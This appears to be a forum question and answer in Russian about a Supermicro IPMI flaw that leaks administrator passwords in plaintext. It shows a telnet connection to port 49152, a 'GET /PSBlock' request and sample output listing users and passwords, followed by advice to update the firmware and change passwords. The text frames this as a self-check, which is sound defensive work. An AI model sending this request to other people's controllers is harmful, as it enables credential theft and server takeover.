У меня есть несколько серверов Supermicro с запущенным IPMI, и, как описано в этом блоге (http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras) существует критическая уязвимость, позволяющая получить пароли администратора в открытом виде из любого удаленного места.
Как проверить, не взломана ли материнская плата моего сервера?
Просто подключитесь к IP-адресу IPMI в порту 49152 и выполните конкретный запрос GET. Вы должны получить своих пользователей и пароли, если вас скомпрометируют.
telnet server.example.com 49152
После подключения попросите GET /PSBlock и посмотрите результаты, должно получиться примерно так:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Ответ:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Для решения этой проблемы обновите прошивку IPMI до последней версии. Прошивка предназначена для вашего контроллера IPMI, поэтому вы должны получить ее, указанную на веб-сайте Supermicro.
Потом после обновления прошивки смени свои пароли.